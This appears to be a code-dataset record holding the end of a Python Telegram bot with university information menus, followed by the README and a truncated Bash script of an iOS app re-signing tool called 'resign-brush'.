Галицька,201Б м.Івано-Франківськ \\n'\n 'тел. 
(0342)78-81-05 \\nE-mail: [email protected]')\n url(call.message, 'https://lib.pnu.edu.ua/', textFac, message_textFac)\n backend(call.message,'Back2')\n elif call.data=='Дистанційне навчання':\n strily(call.message,call.data)\n smile(call.message)\n f8 = open('Information/Студент,Абітурієнт/ДистНавчання.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f8.read())\n url(call.message, 'https://d-learn.pnu.edu.ua/', 'Сайт дистанційного навчання', 'Для того щоб перейти '\n 'на веб-сайт дистанційного навчання ПНУ - перейдіть за посиланням нище:')\n backend(call.message,'Back2')\n elif call.data=='Оплата за навчання':\n strily(call.message,call.data)\n cost(call.message)\n backend(call.message, 'Back2')\n elif call.data=='Вартість навчання2':\n strily(call.message,call.data)\n url(call.message, 'https://pnu.edu.ua/wp-content/uploads/2020/05/223_28.04.2020.pdf',\n bulavka+'Вартість навчання 2020-2021', lupa + 'Вартість навчання на 2020-2021рp можна знайти за посиланням:')\n backend(call.message,'Back4.2')\n elif call.data=='Вартість навчання1':\n strily(call.message,call.data)\n url(call.message, 'https://pnu.edu.ua/wp-content/uploads/2019/07/Наказ-391-new.pdf',\n bulavka+'Вартість навчання 2019-2020','Вартість навчання на 2019-2020pp можна знайти за посиланням:')\n backend(call.message,'Back4.2')\n elif call.data=='Вартість навчання3':\n strily(call.message,call.data)\n url(call.message, 'https://pnu.edu.ua/wp-content/uploads/2019/08/1903_190823130333_001.pdf',\n bulavka+'Вартість гуртожитків 2019-2020','Вартість проживання у гуртожитках на 2019-2020pp можна знайти за посиланням:')\n backend(call.message,'Back4.2')\n elif call.data=='Довідка':\n strily(call.message,call.data)\n url(call.message, 'http://comp-sc.if.ua/dovidka/', 'Довідка', 'Для того,щоб оформити довідку - перейди за посиланням.'\n '\\nP.S. 
На жаль, на сьогоднішній момент довідку можуть оформити тільки студенти факультету математики і інформатики')\n backend(call.message,'Back2')\n elif call.data == 'Студенські чати':\n strily(call.message,call.data)\n bot.send_message(call.message.chat.id, 'Telegram: \\n@pnutalk \\n@pnuchat \\n@pnulife \\n' )\n url(call.message, 'https://www.facebook.com/groups/pnulife', 'Facebook', 'А також y Facebook:')\n url(call.message, 'https://instagram.com/pnulife/', 'Instagram', 'Не маєш , Facebook, то заходь в Instagram:')\n backend(call.message,'Back2')\n elif call.data == 'Розклад занять':\n strily(call.message,call.data)\n bot.send_message(call.message.chat.id, 'Розклад можна знайти в телеграм-боті: @std_pnu_bot')\n url(call.message, 'http://asu.pnu.edu.ua/cgi-bin/timetable.cgi', 'Веб-розклад', 'А також на сайті:')\n backend(call.message,'Back2')\n\n elif call.data == 'Підбір спеціальності':\n pidbirSpez(call.message)\n\n elif call.data == 'Перелік ЗНО':\n strily(call.message,call.data)\n url(call.message, 'https://admission.pnu.edu.ua/wp-content/uploads/sites/6/2019/12/Додаток-4-до-ПП-20201227.pdf',\n 'Перелік ЗНО', 'Для того, щоб переглянути список можливих спеціальностей в нашому університеті та ЗНО, '\n 'неохідних для поступлення, можеш перейти за посиланням нище: ')\n backend(call.message,'Back3')\n elif call.data == 'Підготовчі курси':\n strily(call.message,call.data)\n smile(call.message)\n backend(call.message,'Back3')\n elif call.data == 'Запитання і відповіді':\n strily(call.message,call.data)\n f8 = open('Information/Студент,Абітурієнт/ЗапитанняВідповіді.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f8.read())\n bot.send_message(call.message.chat.id,\n ' Якщо ти не знайшов відповідь на свої запитання, то пиши нам на пошту:'\n '\\[email protected] \\nМи постараємось відповісти на все, що тебе цікавить.')\n backend(call.message,'Back3')\n elif call.data == 'Кафедра військової підготовки':\n strily(call.message,call.data)\n f8 = 
open('Information/Студент,Абітурієнт/КафедраВійськ.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f8.read())\n viskovaKaf(call.message)\n #backend(call.message,'Back3')\n elif call.data=='Перелік документів':\n strily(call.message,call.data)\n f8 = open('Information/Студент,Абітурієнт/ПерелікДокументів.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f8.read())\n backend(call.message,'Back4.6')\n elif call.data=='Строки':\n strily(call.message,call.data)\n f8 = open('Information/Студент,Абітурієнт/Строки.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f8.read())\n backend(call.message,'Back4.6')\n elif call.data == 'Правила прийому':\n strily(call.message, call.data)\n url(call.message, 'https://admission.pnu.edu.ua/wp-content/uploads/sites/6/2019/12/Додаток-9-'\n 'правила-прийому-на-кафедру-військової-підготовки-у-2020.pdf', 'Правила прийому',\n 'Правила прийому можна переглянути за посиланням:')\n backend(call.message, 'Back4.6')\n elif call.data == 'Програми вступних випробувань':\n strily(call.message, call.data)\n url(call.message, 'https://admission.pnu.edu.ua/wp-content/uploads/sites/6/2020/03/програма-з-ДПЮ-2020.pdf',\n 'Допризовна підготовка', 'Програми вступних випробувань.Оцінка рівня допризовної підготовки:')\n url(call.message, 'https://admission.pnu.edu.ua/wp-content/uploads/sites/6/2020/03/програма-з-ФІЗО-2020.pdf',\n 'Фізична підготовка', 'Програми вступних випробувань.Оцінка рівня фізичної підготовленості:')\n url(call.message, 'https://admission.pnu.edu.ua/wp-content/uploads/sites/6/2020/03/програма-проф.pdf',\n 'Психологічний відбір', 'Програми вступних випробувань. 
Професійний психологічний відбір:')\n backend(call.message, 'Back4.6')\n elif call.data == 'Розклад вступних випробувань':\n strily(call.message, call.data)\n url(call.message, 'https://admission.pnu.edu.ua/wp-content/uploads/sites/6/2020/03/І-етап-військова-кафедра.pdf',\n 'Розклад', 'Розклад вступних випробувань(перший етап):')\n backend(call.message, 'Back4.6')\n elif call.data == 'Іноземному студенту':\n strily(call.message,call.data)\n inozem(call.message)\n elif call.data=='Порядок прийому':\n strily(call.message,call.data)\n f8 = open('Студент,АбітурієнтПорядок/ПрийомуІноз1.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f8.read())\n f9 = open('Студент,АбітурієнтПорядок/ПрийомуІноз2.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f9.read())\n backend(call.message,'Back4.7')\n elif call.data=='Вартість навчання':\n strily(call.message,call.data)\n f8 = open('Information/Студент,Абітурієнт/ВартістьНавчанняІноз.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f8.read())\n backend(call.message,'Back4.7')\n\n elif call.data=='Керівництво':\n strily(call.message,call.data)\n f1 = open('Information/Контакти/Керівництво.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f1.read())\n backend(call.message,'Back4.3')\n elif call.data=='Приймальна комісія':\n strily(call.message,call.data)\n f2 = open('Information/Студент,Абітурієнт/ПриймальнаКомісія.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f2.read())\n backend(call.message,'Back4.3')\n elif call.data=='Бухгалтерія':\n strily(call.message,call.data)\n f3 = open('Information/Контакти/Бухгалтерія.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f3.read())\n backend(call.message,'Back4.3')\n elif call.data=='Громадські організації':\n strily(call.message,call.data)\n f4 = open('Information/Контакти/ГромадськіОрганізації.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f4.read())\n 
backend(call.message,'Back4.3')\n elif call.data=='Музеї':\n strily(call.message,call.data)\n f5 = open('Information/Контакти/Музеї.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f5.read())\n backend(call.message,'Back4.3')\n elif call.data=='Спортивний комплекс':\n strily(call.message,call.data)\n f6 = open('Information/Контакти/СпортивнийКомплекс.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n backend(call.message,'Back4.3')\n elif call.data=='Навчальні корпуси':\n strily(call.message,call.data)\n f6 = open('Information/Контакти/НавчальніКорпуси.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n backend(call.message,'Back4.3')\n elif call.data=='Студенське містечко':\n strily(call.message,call.data)\n f6 = open('Information/Контакти/СтуденськеМістечко.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n backend(call.message,'Back4.3')\n elif call.data=='Наукові підрозділи':\n strily(call.message,call.data)\n f10 = open('Information/Контакти/НавчальніПід1.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f10.read())\n f11 = open('Information/Контакти/НавчальніПід2.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f11.read())\n backend(call.message,'Back4.3')\n elif call.data=='Навчальні центри':\n strily(call.message,call.data)\n f6 = open('Information/Контакти/НавчальніЦентриДист.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f6.read())\n backend(call.message,'Back4.3')\n\n elif call.data=='Юридичний інститут':\n strily(call.message,call.data)\n f8 = open('Information/Інститути/ЮридичнийІнститут.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f8.read())\n url(call.message, 'https://law.pnu.edu.ua/en/', textInst, message_textFac)\n backend(call.message,'Back4.5')\n elif call.data=='Коломийський інститут':\n strily(call.message,call.data)\n f9 = open('Information/Інститути/КоломийськийІнститут.txt', 
'r')\n bot.send_message(chat_id=call.message.chat.id, text=f9.read())\n url(call.message, 'https://knni.pnu.edu.ua/en/', textInst, message_textFac)\n backend(call.message,'Back4.5')\n elif call.data=='Інститут післядипломної освіти...':\n strily(call.message,call.data)\n f8 = open('Information/Інститути/Післядипломна.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f8.read())\n url(call.message, 'https://ipodp.pnu.edu.ua/', textInst, message_textFac)\n backend(call.message,'Back4.5')\n elif call.data=='Інститут мистецтв':\n strily(call.message,call.data)\n\n f8 = open('Information/Інститути/ІнституМистецтв.txt', 'r')\n bot.send_message(chat_id=call.message.chat.id, text=f8.read())\n url(call.message, 'https://art.pnu.edu.ua/en/', textInst, message_textFac)\n backend(call.message,'Back4.5')\n\n\n\n elif call.data=='Back1':\n any_univer(call.message)\n elif call.data=='Back2':\n any_student(call.message)\n elif call.data=='Back3':\n any_abit(call.message)\n elif call.data=='Back4.1':\n any_msg(call.message)\n elif call.data=='Back4.2':\n cost(call.message)\n elif call.data=='Back4.3':\n any_contacts(call.message)\n elif call.data=='Back4.4':\n any_units(call.message)\n elif call.data=='Back4.5':\n any_insityt(call.message)\n elif call.data=='Back4.6':\n viskovaKaf(call.message)\n elif call.data=='Back4.7':\n inozem(call.message)\n elif call.data=='Back4.8':\n pidbirSpez(call.message)\n\[email protected]_handler(content_types=[\"text\"])\ndef any_abit(message):\n bot.send_message(message.chat.id, 12 * strilky)\n Atext = 'Інформація для абітурієнта:'\n #bot.send_message(chat_id=message.chat.id, text=('Твій вибір: ' + Atext))\n keyboard = telebot.types.InlineKeyboardMarkup()\n\n btn1 = telebot.types.InlineKeyboardButton(text='Підбір спеціальності по ЗНО', callback_data='Підбір спеціальності')\n btn2 = telebot.types.InlineKeyboardButton(text='Перелік ЗНО для вступу', callback_data='Перелік ЗНО')\n #btn3 = 
telebot.types.InlineKeyboardButton(text='Підготовчі курси', callback_data='Підготовчі курси')\n btn4 = telebot.types.InlineKeyboardButton(text='Приймальна комісія', callback_data='Приймальна комісія')\n btn5 = telebot.types.InlineKeyboardButton(text='Оплата за навчання/гуртожиток', callback_data='Оплата за навчання')\n btn6 = telebot.types.InlineKeyboardButton(text='Контакти', callback_data='Контакти')\n btn9 = telebot.types.InlineKeyboardButton(text='Запитання і відповіді', callback_data='Запитання і відповіді')\n btn8 = telebot.types.InlineKeyboardButton(text='Кафедра військової підготовки', callback_data='Кафедра військової підготовки')\n btn7 = telebot.types.InlineKeyboardButton(text='Іноземному студенту', callback_data='Іноземному студенту')\n\n keyboard.add(btn1)\n keyboard.add(btn2)\n #keyboard.add(btn3)\n keyboard.add(btn4)\n keyboard.add(btn5)\n keyboard.add(btn6)\n keyboard.add(btn7)\n keyboard.add(btn8)\n keyboard.add(btn9)\n bot.send_message(message.chat.id, text=Atext, reply_markup=keyboard)\ndef any_univer(message):\n bot.send_message(message.chat.id, 12 * strilky)\n Utext='Інформація про університет:'\n #bot.send_message(chat_id=message.chat.id, text=('Твій вибір: ' + Utext))\n keyboard = telebot.types.InlineKeyboardMarkup()\n\n btn1 = telebot.types.InlineKeyboardButton(text='Історія', callback_data='Історія')\n btn2 = telebot.types.InlineKeyboardButton(text='Підрозділи', callback_data='Підрозділи')\n btn3 = telebot.types.InlineKeyboardButton(text='Контакти', callback_data='Контакти')\n\n keyboard.add(btn1)\n keyboard.add(btn2)\n keyboard.add(btn3)\n bot.send_message(message.chat.id, text=Utext, reply_markup=keyboard)\ndef backend(message, text):\n keyboard = telebot.types.InlineKeyboardMarkup()\n btn1 = telebot.types.InlineKeyboardButton(text='Back '+ backs, callback_data=text)\n keyboard.add(btn1)\n bot.send_message(message.chat.id, text='Повернутись?', reply_markup=keyboard)\ndef strily(message, name):\n bot.send_message(message.chat.id, 
12*strilky)\n bot.send_message(chat_id=message.chat.id, text=('Твій вибір: ' + name))\ndef cost(message):\n keyboard = telebot.types.InlineKeyboardMarkup()\n btn1 = telebot.types.InlineKeyboardButton(text='Вартість навчання 2019-2020pp', callback_data='Вартість навчання1')\n btn2 = telebot.types.InlineKeyboardButton(text='Вартість навчання 2020-2021pp', callback_data='Вартість навчання2')\n btn3 = telebot.types.InlineKeyboardButton(text='Вартість гуртожитків 2019-2020pp', callback_data='Вартість навчання3')\n keyboard.add(btn1)\n keyboard.add(btn2)\n keyboard.add(btn3)\n bot.send_message(message.chat.id, text='Вартість навчання на 2019-2021рік можна знайти за посиланням:', reply_markup=keyboard)\ndef any_units(message):\n keyboard = telebot.types.InlineKeyboardMarkup()\n btn1 = telebot.types.InlineKeyboardButton(text='Інститути', callback_data='Інститути')\n btn2 = telebot.types.InlineKeyboardButton(text='Факультети', callback_data='Факультети')\n btn3 = telebot.types.InlineKeyboardButton(text='Івано-Франківський коледж', callback_data='Коледж')\n keyboard.add(btn1)\n keyboard.add(btn2)\n keyboard.add(btn3)\n bot.send_message(message.chat.id, text='Підрозділи:', reply_markup=keyboard)\n backend(message, 'Back1')\ndef any_student(message):\n bot.send_message(message.chat.id, 12 * strilky)\n Stext='Інформація для студента'\n #bot.send_message(chat_id=message.chat.id, text=('Твій вибір: ' + Stext))\n keyboard = telebot.types.InlineKeyboardMarkup()\n btn1 = telebot.types.InlineKeyboardButton(text='Розклад занять', callback_data='Розклад занять')\n btn2 = telebot.types.InlineKeyboardButton(text='Графік навчального процесу', callback_data='Навчальний процес')\n btn3 = telebot.types.InlineKeyboardButton(text='Наукова бібліотека', callback_data='Наукова бібліотека')\n btn4 = telebot.types.InlineKeyboardButton(text='Дистанційне навчання', callback_data='Дистанційне навчання')\n btn5 = telebot.types.InlineKeyboardButton(text='Оплата за навчання/гуртожиток', 
callback_data='Оплата за навчання')\n #btn6 = telebot.types.InlineKeyboardButton(text='Сайт кафедри', callback_data='Сайт кафедри')\n btn7 = telebot.types.InlineKeyboardButton(text='Довідка про навчання', callback_data='Довідка')\n btn8 = telebot.types.InlineKeyboardButton(text='Студенські чати', callback_data='Студенські чати')\n keyboard.add(btn1)\n keyboard.add(btn2)\n keyboard.add(btn3)\n keyboard.add(btn4)\n keyboard.add(btn5)\n #keyboard.add(btn6)\n keyboard.add(btn7)\n keyboard.add(btn8)\n\n bot.send_message(message.chat.id, text=Stext, reply_markup=keyboard)\ndef any_insityt(message):\n keyboard = telebot.types.InlineKeyboardMarkup()\n\n btn1 = telebot.types.InlineKeyboardButton(text='Інститут післядипломної освіти та довузівської підготовки',\n callback_data='Інститут післядипломної освіти...')\n btn2 = telebot.types.InlineKeyboardButton(text='Коломийський навчально-науковий Інститут', callback_data='Коломийський інститут')\n btn3 = telebot.types.InlineKeyboardButton(text='Навчально-науковий Інститут мистецтв', callback_data='Інститут мистецтв')\n btn4 = telebot.types.InlineKeyboardButton(text='Навчально-науковий Юридичний інститут', callback_data='Юридичний інститут')\n\n keyboard.add(btn1)\n keyboard.add(btn2)\n keyboard.add(btn3)\n keyboard.add(btn4)\n\n bot.send_message(message.chat.id, text='Інститути:', reply_markup=keyboard)\n backend(message, 'Back4.4')\ndef any_contacts(message):\n keyboard = telebot.types.InlineKeyboardMarkup()\n bot.send_sticker(message.chat.id, 'CAACAgIAAxkBAAIKZ17M9gESsdDoOHCPxXsAAaOqdZUUDgAC1wADVp29Cg09r24xpO5XGQQ')\n btn1 = telebot.types.InlineKeyboardButton(text='Керівництво',callback_data='Керівництво')\n btn2 = telebot.types.InlineKeyboardButton(text='Приймальна комісія', callback_data='Приймальна комісія')\n #btn3 = telebot.types.InlineKeyboardButton(text='Відділи університету', callback_data='Відділи університету')\n btn4 = telebot.types.InlineKeyboardButton(text='Бухгалтерія', callback_data='Бухгалтерія')\n btn5 = 
telebot.types.InlineKeyboardButton(text='Навчальні корпуси', callback_data='Навчальні корпуси')\n btn6 = telebot.types.InlineKeyboardButton(text='Громадські організації', callback_data='Громадські організації')\n btn7 = telebot.types.InlineKeyboardButton(text='Студенське містечко', callback_data='Студенське містечко')\n #btn8 = telebot.types.InlineKeyboardButton(text='Заклади харчування', callback_data='Заклади харчування')\n btn9 = telebot.types.InlineKeyboardButton(text='Спортивний комплекс', callback_data='Спортивний комплекс')\n btn10 = telebot.types.InlineKeyboardButton(text='Навчальні центри дистанційних комунікацій', callback_data='Навчальні центри')\n btn11 = telebot.types.InlineKeyboardButton(text='Навчально-наукові підрозділи', callback_data='Наукові підрозділи')\n btn12 = telebot.types.InlineKeyboardButton(text='Музеї', callback_data='Музеї')\n btn13 = telebot.types.InlineKeyboardButton(text='Інститути', callback_data='Інститути')\n btn14= telebot.types.InlineKeyboardButton(text='Факультети', callback_data='Факультети')\n btn15= telebot.types.InlineKeyboardButton(text='Івано-Франківський коледж', callback_data='Коледж')\n keyboard.add(btn1)\n keyboard.add(btn2)\n #keyboard.add(btn3)\n keyboard.add(btn4)\n keyboard.add(btn5)\n keyboard.add(btn6)\n keyboard.add(btn7)\n #keyboard.add(btn8)\n keyboard.add(btn9)\n keyboard.add(btn10)\n keyboard.add(btn11)\n keyboard.add(btn12)\n keyboard.add(btn13)\n keyboard.add(btn14)\n keyboard.add(btn15)\n bot.send_message(message.chat.id, text='Телефонний довідник:', reply_markup=keyboard)\n #any_msg(message)\n #any_insityt(message)\n #backend(message, 'Back1')\ndef viskovaKaf(message):\n keyboard = telebot.types.InlineKeyboardMarkup()\n #bot.send_sticker(message.chat.id, 'CAACAgIAAxkBAAIKZ17M9gESsdDoOHCPxXsAAaOqdZUUDgAC1wADVp29Cg09r24xpO5XGQQ')\n btn1 = telebot.types.InlineKeyboardButton(text='Перелік документів для вступу',callback_data='Перелік документів')\n btn2 = telebot.types.InlineKeyboardButton(text='Строки 
подачі заяв, проведення вступних випробувань, зарахування', callback_data='Строки')\n btn3 = telebot.types.InlineKeyboardButton(text='Правила прийому на кафедру військової підготовки', callback_data='Правила прийому')\n btn4 = telebot.types.InlineKeyboardButton(text='Програми вступних випробувань', callback_data='Програми вступних випробувань')\n btn5 = telebot.types.InlineKeyboardButton(text='Розклад вступних випробувань', callback_data='Розклад вступних випробувань')\n keyboard.add(btn1)\n keyboard.add(btn2)\n keyboard.add(btn3)\n keyboard.add(btn4)\n keyboard.add(btn5)\n bot.send_message(message.chat.id, text='Детальніше:', reply_markup=keyboard)\n backend(message, 'Back3')\n\n\ndef inozem(message):\n keyboard = telebot.types.InlineKeyboardMarkup()\n btn1 = telebot.types.InlineKeyboardButton(text='Порядок прийому на навчання', callback_data='Порядок прийому')\n btn2 = telebot.types.InlineKeyboardButton(text='Вартість навчання', callback_data='Вартість навчання')\n keyboard.add(btn1)\n keyboard.add(btn2)\n bot.send_message(message.chat.id, text='Інформація для іноземного студента:',reply_markup=keyboard)\n backend(message, 'Back3')\ndef pidbirSpez(message):\n bot.send_message(message.chat.id, 12 * strilky)\n Stext = 'Підбір спеціальності'\n bot.send_message(chat_id=message.chat.id, text=('Твій вибір: ' + Stext))\n f8 = open('Information/ЗНО/ZNO.txt', 'r')\n bot.send_message(chat_id=message.chat.id, text=f8.read())\n backend(message, 'Back3')\n\ndef smile(message):\n #bot.send_sticker(message.chat.id, 'CAACAgIAAxkBAANwXskTHd5uisB9m9Z5CMe_1Xb0k8AAAloAA2CJbQwxXLT_o2OKHxkE')\n bot.send_message(message.chat.id, 'Нічого нового ')\nbot.polling()" } ]
2
colourful987/resign-brush
https://github.com/colourful987/resign-brush
bb38fabda0f53a1917b2eceefbf9ef2ed7a3a28c
b183529aefbbbc94749635e592dc32370c6e7645
d3ac258fa68db241c31f7babe07f331b4b44e63d
refs/heads/master
2021-01-02T19:08:22.777030
2020-02-11T14:48:32
2020-02-11T14:48:32
239,758,122
4
0
null
null
null
null
null
[ { "alpha_fraction": 0.6461635828018188, "alphanum_fraction": 0.6588459014892578, "avg_line_length": 27.654544830322266, "blob_id": "04785db8460154305f1224c011c9a70444cd8c85", "content_id": "07b58aa68772edda7993881f7f795f2b05894b35", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1819, "license_type": "permissive", "max_line_length": 183, "num_lines": 55, "path": "/README.md", "repo_name": "colourful987/resign-brush", "src_encoding": "UTF-8", "text": "# Resign Brush\n\nresign for `*.ipa/*.app` with your own certificate and provisioning profile. Once resign, you can install app in your iPhone.\n\n## Getting Started\n\nStart by using `python3.7 resign_brush -h` to get all usage.\n\n```shell\nusage: resign_brush.py [-h] {doctor,fast-resign} ...\n\npositional arguments:\n {doctor,fast-resign}\n doctor 检查 resign brush 依赖环境\n fast-resign 使用证书和描述文件重签名应用程序包\n\noptional arguments:\n -h, --help show this help message and exit\n \n```\n\nYou can resign an app with `python3.7 resign_brush.py fast-resign` cmd. However, make sure you have an valid certificate and provisioning profile which named embedded.mobileprovision:\n\n```shell\n~# : python3.7 resign_brush.py fast-resign -h\nusage: resign_brush.py fast-resign [-h] -c CERT -p PROVISION -a APP -o OUTPUT\n\noptional arguments:\n -h, --help show this help message and exit\n -c CERT, --cert CERT 请输入有效签名的开发证书或发布证书名,支持企业证书(299$),公司证书(99$,非下面分配的开发者证书),\n 独立开发者证书(99$,仅此一号)\n -p PROVISION, --provision PROVISION\n 配套的描述文件(embedded.mobileprovision)路径,unzip your app to\n search and get it.\n -a APP, --app APP 原始应用程序包文件路径,支持 .ipa 和 .app 格式\n -o OUTPUT, --output OUTPUT\n 签名后的程序包,支持 .ipa 和 .app 格式\n```\n\n### Deploying\n\nHere Provide **setup.py**, so you can use setuptools to install it like this . 
\n\n```shell\npython3.7 setup.py sdist\n\npip3.7 install dist/resign-brush-1.0.0.tar.gz\n\n# now you can use resign-brush anywhere\nresign-brush -h\n```\n\n\n\n## Contributing\n\n" }, { "alpha_fraction": 0.5556249022483826, "alphanum_fraction": 0.5635824799537659, "avg_line_length": 24.579999923706055, "blob_id": "66bdd652a1ad949de78e203eefed9bdd3ed2a12c", "content_id": "6299953813f3a5d8f40a2ecb4d163533bb9cf427", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 7684, "license_type": "permissive", "max_line_length": 123, "num_lines": 250, "path": "/bin/fast-resign-brush.sh", "repo_name": "colourful987/resign-brush", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\nDIR=\"$(cd \"$(dirname \"${BASH_SOURCE[0]}\")\" && pwd)\"\n\nfunction run {\n\techo \"[√] Executing command: $@\"\n\t$@\n\tif [[ $? != \"0\" ]]; then\n\t\techo \"[×] Executing the above command has failed!\"\n\t\texit 1\n\tfi\n}\n\nfunction run_at {\n\tpushd \"$1\" > /dev/null 2>&1\n\tshift > /dev/null 2>&1\n\trun \"$@\" > /dev/null 2>&1\n\tpopd > /dev/null 2>&1\n}\n\nfunction verify_certificate {\n\techo \"[∞] 开始证书验证...\"\n\tlocal cert=\"$1\"\n\tlocal search=$(security find-identity -v -p codesigning | grep \"$cert\")\n\n\tif [[ -z \"${search}\" ]]; then\n\t\techo \"[×] 签名证书 ${cert} 未找到,为你找到当前可用的证书\"\n\t\tlist_available_certificates\n\t\texit 1\n\tfi\n\n\techo \"[√] 证书验证通过\"\n}\n\nfunction list_available_certificates {\n\trun \"security find-identity -v -p codesigning\"\n}\n\nfunction create_workspace_dir {\n\tlocal dir=\"$1\"\n\n\tif [[ ! -d \"${dir}\" ]]; then\n\t echo \"[∞] 开始创建临时工作目录...\"\n\t\trun \"mkdir ${dir}\"\n\t\techo \"[√] 创建成功:${dir} \"\n\tfi\n}\n\nfunction prepare_app_package {\n\tlocal workspace_dir=\"$1\"\n\tlocal source_file=\"$2\"\n\tlocal source_ext=${source_file##*.}\n\n\t# (optional) ipa 文件转成 app 文件\n\tif [[ ${source_ext} == \"ipa\" ]]; then\n\n\t\tif [[ ! 
-f \"${source_file}\" ]]; then\n\t\t\techo \"[×] 未找到 ipa 应用程序,请检查路径:${source_file}\"\n\t\t\texit 1\n\t\tfi\n\t\trun_at \"${workspace_dir}\" \"unzip -qo ${source_file}\"\n\n\telif [[ ${source_ext} == \"app\" ]]; then\n\t\tif [[ ! -d \"${source_file}\" ]]; then\n\t\t\techo \"[×] 未找到 app 应用程序,请检查路径:${source_file}\"\n\t\t\texit 1\n\t\tfi\n\n\t\trun_at \"${workspace_dir}\" \"mkdir Payload\"\n\t\trun_at \"${workspace_dir}\" \"cp -rf ${source_file} Payload\"\n\telse\n\t\techo \"[×] 当前仅支持 .ipa 和 .app 程序包格式\"\n\t\texit 1\n\tfi\n}\n\nAPS_ENV=\"production\"\nfunction check_aps_environment {\n local workspace_dir=\"$1\"\n\n cd ${workspace_dir}\n # ========================= 作用域是新创建的工作区 =====================\n\tAPP=\"$(find $(pwd) -name \"*.app\" | head -n 1)\"\n\tif [[ -z \"${APP}\" ]]; then\n\t\techo \"[×] 工作区未找到可用的 .app 文件!\"\n\t\texit 1\n\tfi\n\torigin_prov_file=\"${APP}/embedded.mobileprovision\"\n\n\tsecurity cms -D -i ${origin_prov_file} > origin-embedded.plist\n\taps_env=$(/usr/libexec/PlistBuddy -c 'Print:Entitlements:aps-environment' origin-embedded.plist)\n\n\tif [[ \"${aps_env}\" != \"\" ]]; then\n\t APS_ENV=${aps_env}\n\telse\n\t echo \"[!] 应用程序无法确定包类型,使用默认签名\"\n\tfi\n # ====================================================================\n\tcd - # 恢复目录\n}\n\nfunction check_provision_file {\n local prov_file=\"$1\"\n\n # 描述文件检查\n if [[ ! \"${prov_file}\" =~ \"embedded.mobileprovision\" ]]; then\n echo \"[×] 描述文件必须以 embedded.mobileprovision 命名\"\n exit 1\n fi\n\n if [[ ! 
-f \"${prov_file}\" ]]; then\n echo \"[×] 未找到描述文件,请检查文件路径:${prov_file}\"\n exit 1\n fi\n}\n\n# 重签名应用程序\nfunction resign {\n\tlocal certificate_name=\"$1\"\n\tlocal provision_file=\"$2\"\n\tlocal workspace_dir=\"$3\"\n\tlocal source_file=\"$4\"\n\tlocal target_file=\"$5\"\n\n\tcd ${workspace_dir}\n\n\t# ========================= 作用域是新创建的工作区 =====================\n\tAPP=\"$(find $(pwd) -name \"*.app\" | head -n 1)\"\n\n\tif [[ -z \"${APP}\" ]]; then\n\t\techo \"[×] 工作区未找到可用的 .app 文件!\"\n\t\texit 1\n\tfi\n\n\trun \"cp ${provision_file} .\" \n\tsecurity cms -D -i ${provision_file} > embedded.plist\n\t/usr/libexec/PlistBuddy -x -c 'Print:Entitlements' embedded.plist > entitlements.plist\n\n\tpayload_dir=\"${workspace_dir}/Payload\"\n\n\t# 删除旧的签名文件\n\tfind ${payload_dir} -d -name \"_CodeSignature\" | xargs rm -rf\n\n\t# 查找要重签名的所有文件清单\n\tfind ${payload_dir} -d \\( -name \"*.app\" -o -name \"*.appex\" -o -name \"*.framework\" -o -name \"*.dylib\" \\) > resign-list.txt\n\n\tif [[ ! -f resign-list.txt ]]; then\n\t\techo \"[×] 应用中未找到可重签名的项目!\"\n\t\texit 1\n\tfi\n\n\twhile IFS='' read -r file_2_resign || [[ -n \"$file_2_resign\" ]]; do\n\t\tret=$(/usr/bin/codesign -f -s \"${certificate_name}\" --entitlements entitlements.plist \"$file_2_resign\" > /dev/null 2>&1)\n\t\tif [[ \"$ret\" =~ \"no identity found\" ]]; then\n\t\t echo \"[×] resign failed:${file_2_resign} check certificate name\"\n\t\t exit 1\n\t\tfi\n\t\techo \"[√] resign :${file_2_resign##*/}\"\n\tdone < resign-list.txt\n\n echo \"[√] app resign complete, check result.\"\n\techo \"----------------------------------------------------------------\"\n\tcodesign -vv -d \"${APP}\"\n\techo \"----------------------------------------------------------------\"\n\t# =========================\t\t\tend \t\t ======================\n\tcd - # 恢复目录\n}\n\nfunction output_target_file {\n local workspace=\"$1\"\n local output_file=\"$2\"\n\n payload_dir=\"${workspace}/Payload\"\n\n if [[ ! 
